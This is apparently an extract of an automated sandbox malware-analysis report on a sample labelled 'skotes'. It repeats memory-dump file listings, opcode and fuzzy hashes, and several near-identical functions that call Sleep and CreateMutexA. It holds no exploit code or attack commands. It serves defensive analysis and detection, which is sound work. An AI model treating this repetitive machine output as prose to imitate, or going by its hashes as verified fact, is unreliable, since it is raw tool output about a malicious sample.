Associated: 00000003.00000002.268899409985.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899456104.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899506082.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899558796.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899604806.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899647227.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899692997.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899733316.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899733316.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899873452.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899915305.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899955435.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900002889.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900050472.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900094567.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900135220.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900186248.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900228243.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9c0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 1b4e911a46b2dbbb08385f35bf8b926d4ded7a2b9eec9e8217da7b70a7a96c1b
Instruction ID: c34d0296929520399d3527981fac5f923bf9452caac5cfbc80298f2b15fca0dd
Opcode Fuzzy Hash: 1b4e911a46b2dbbb08385f35bf8b926d4ded7a2b9eec9e8217da7b70a7a96c1b
Instruction Fuzzy Hash: EE312831B402059BEB08EB68DCCDFADBB66EBD6314F20821DE454A73D5C77989808752

Function 009C9F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 009CA963
CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981

Memory Dump Source

Source File: 00000003.00000002.268897285467.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000003.00000002.268897231334.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897285467.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897469676.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897531196.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897605032.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897963140.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898007853.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898064981.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898115829.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898160888.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898160888.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898257929.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898307061.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898351313.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898396305.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898441590.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898485575.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898530916.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898572212.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898614687.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898658203.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898713220.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898762071.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898796658.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898834319.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898872512.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898911110.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898958632.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899004161.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899049281.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899095311.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899158645.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899205310.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899242154.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899281797.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899324488.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899367116.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899409985.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899456104.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899506082.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899558796.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899604806.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899647227.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899692997.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899733316.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899733316.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899873452.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899915305.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899955435.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900002889.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900050472.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900094567.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900135220.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900186248.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900228243.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9c0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 72517fc9f6ba64bfb0af11e952d6cabc952dc591203e3d0a05287f1f4400b0f3
Instruction ID: b2c40490a944987397b39baecce36dff586fa88ed79a0e58b0ccc3917e620fb8
Opcode Fuzzy Hash: 72517fc9f6ba64bfb0af11e952d6cabc952dc591203e3d0a05287f1f4400b0f3
Instruction Fuzzy Hash: A2312831B002099BEB18DB68D88DFADBB66EBC6314F20861DE414EB3D5C73989808753

Function 009CA079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 009CA963
CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981

Memory Dump Source

Source File: 00000003.00000002.268897285467.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000003.00000002.268897231334.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897285467.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897469676.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897531196.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897605032.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897963140.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898007853.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898064981.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898115829.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898160888.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898160888.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898257929.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898307061.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898351313.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898396305.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898441590.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898485575.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898530916.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898572212.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898614687.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898658203.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898713220.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898762071.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898796658.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898834319.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898872512.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898911110.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898958632.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899004161.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899049281.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899095311.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899158645.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899205310.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899242154.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899281797.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899324488.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899367116.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899409985.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899456104.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899506082.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899558796.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899604806.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899647227.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899692997.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899733316.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899733316.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899873452.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899915305.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899955435.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900002889.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900050472.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900094567.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900135220.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900186248.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900228243.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9c0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: aea1960034fe0b3f475ba1eff9c9d459032634be2bdc9c1e5621e40bfd90163b
Instruction ID: d8da58d61ddd3d1b081ab4099d01c63e47251f612e92d394f2ef9cb386456829
Opcode Fuzzy Hash: aea1960034fe0b3f475ba1eff9c9d459032634be2bdc9c1e5621e40bfd90163b
Instruction Fuzzy Hash: 90316831B052099BEB08DB78CCC9FADBB66EBC6318F24821CE014973D1C73A99808757

Function 009CA1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 009CA963
CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981

Memory Dump Source

Source File: 00000003.00000002.268897285467.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000003.00000002.268897231334.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897285467.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897469676.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897531196.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897605032.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897963140.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898007853.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898064981.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898115829.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898160888.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898160888.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898257929.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898307061.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898351313.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898396305.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898441590.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898485575.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898530916.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898572212.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898614687.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898658203.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898713220.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898762071.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898796658.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898834319.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898872512.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898911110.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898958632.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899004161.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899049281.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899095311.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899158645.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899205310.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899242154.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899281797.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899324488.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899367116.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899409985.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899456104.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899506082.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899558796.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899604806.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899647227.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899692997.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899733316.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899733316.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899873452.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899915305.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899955435.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900002889.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900050472.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900094567.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900135220.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900186248.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900228243.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9c0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: ea3c1b70ba86fdbc9a752ce754555bd61030749c1d80974a4ac4d318b3894e77
Instruction ID: b20d0387beefe499a18127a95eca0e4a4b2b397420baf179cd0c43ff63e39f0d
Opcode Fuzzy Hash: ea3c1b70ba86fdbc9a752ce754555bd61030749c1d80974a4ac4d318b3894e77
Instruction Fuzzy Hash: 62313931B052099BEB08DB68DCC9F6DBB66ABC6314F24861DE014973D5C73999808753

Function 009CA418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 009CA963
CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981

Memory Dump Source

Source File: 00000003.00000002.268897285467.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000003.00000002.268897231334.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897285467.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897469676.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897531196.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897605032.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897963140.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898007853.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898064981.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898115829.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898160888.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898160888.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898257929.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898307061.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898351313.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898396305.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898441590.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898485575.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898530916.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898572212.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898614687.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898658203.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898713220.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898762071.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898796658.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898834319.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898872512.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898911110.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898958632.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899004161.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899049281.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899095311.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899158645.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899205310.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899242154.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899281797.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899324488.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899367116.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899409985.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899456104.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899506082.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899558796.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899604806.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899647227.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899692997.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899733316.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899733316.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899873452.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899915305.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899955435.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900002889.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900050472.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900094567.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900135220.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900186248.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900228243.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9c0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: f92235b8b724c1b359a2cd76c139674ebd97795157fc06d7daf28aeecbd72ee1
Instruction ID: f16af29cac5475c81de91898622ef2fb2250671172ae7ddabc3b80c94905cafd
Opcode Fuzzy Hash: f92235b8b724c1b359a2cd76c139674ebd97795157fc06d7daf28aeecbd72ee1
Instruction Fuzzy Hash: 20312931B012099BEB089B78DCCDFADBA65EBD5318F20821CE455973E5C77989808757

Function 009CA54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 009CA963
CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981

Memory Dump Source

Source File: 00000003.00000002.268897285467.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000003.00000002.268897231334.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
